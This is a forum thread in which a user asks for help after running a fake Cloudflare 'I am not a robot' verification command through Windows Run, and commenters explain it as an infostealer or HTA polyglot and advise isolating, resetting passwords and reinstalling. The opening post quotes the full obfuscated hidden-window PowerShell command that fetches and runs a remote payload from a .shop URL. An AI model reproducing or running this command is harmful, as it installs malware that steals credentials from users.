I accidentally executed
POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\m*ht*e https://mnjk-jk.bsdfg-zmp-q-n.shop/1.mp4 # ✅ ''Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 715921''
via Windows Run a couple of days ago. Realized what I had done today after seeing a post on it.
What should I do? is full system wipe necessary? or can I remove it somehow?
If I need to do a system format what about attached drives and other devices on the network?
You must log in or # to comment.
as others have said its a virus, its probably a infostealer, it might have some sort of persistance mechanism so put your pc offline and use another one to change all of your passwords (email & banks ones first) and log out everywhere to invalidate tokens, if youve saved cards freeze them, then wipe your pc that got infected and fresh install https://www.youtube.com/watch?v=HUR4QOHEurY
What is that supposed to do?
I’m not too sure. I think -w runs powershell silently?! I’m hoping someone can figure out the rest.
well thats the neat part, the url it presumably downloads and executes the first payload from has died so no unless you catch it when its live you can’t easily replicate what happended on your computer anywhere else i have no clue what the powershell is doing but hiding malware in a weird file or pretending its a different file type and then executing that file isn’t uncommon
This example is likely an HTA polyglot. An actual MP4 is merged with a binary, basically. The MP4 will play as normal, but the powershell is responsible for execution of the malware.
I’m on
Version 21H2 Installed on 06-12-2024 OS build 19044.5608 Experience Windows Feature Experience Pack 1000.19061.1000.0if that’s relevant
